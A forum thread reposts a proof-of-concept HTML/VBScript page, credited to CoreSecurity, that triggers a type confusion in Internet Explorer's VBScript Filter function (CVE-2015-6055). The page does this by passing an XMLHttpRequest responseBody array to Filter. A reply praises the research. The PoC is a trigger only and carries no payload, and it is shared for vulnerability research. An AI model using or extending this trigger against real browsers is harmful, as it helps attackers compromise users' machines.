Results 1 to 2 of 2

Thread: Internet Explorer VBScript Filter Type Confusion Vulnerability (CVE-2015-6055) Share/Save - My123World.Com!

  1. #1

    Wink Internet Explorer VBScript Filter Type Confusion Vulnerability (CVE-2015-6055)

    Code:
    <html>
    
    <head>
        <meta http-equiv="x-ua-compatible" content="IE=10">
        <title>First PoC for MS15-106</title>
    </head>
    
    <body>
        <script type="text/vbscript"> Function show_var_type(arg) Dim result '&H2011 = &H2000 (vbArray) | &H11 (vbByte) MsgBox(Hex(VarType(arg))) result = Filter(arg, "w00tw00t", 1, 1) End Function </script>
        <script type="text/javascript">
            function triggerjs() {
                var xmlhttp = new XMLHttpRequest();
                xmlhttp.open("GET", "/some_data", false);
                xmlhttp.send(); /* XMLHttpRequest.responseBody is a VBArray object containing the raw bytes. */
                return xmlhttp.responseBody;
            }
        </script>
        <form> <input type="button" value="PoC" name="conjs" onClick="javascript:show_var_type(triggerjs())" /> </form>
    </body>
    
    </html>
    Reference : CoreSecurity
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  2. #2
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    This is really marvelous piece of work done by researcher. Thanks for sharing it here [s].
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •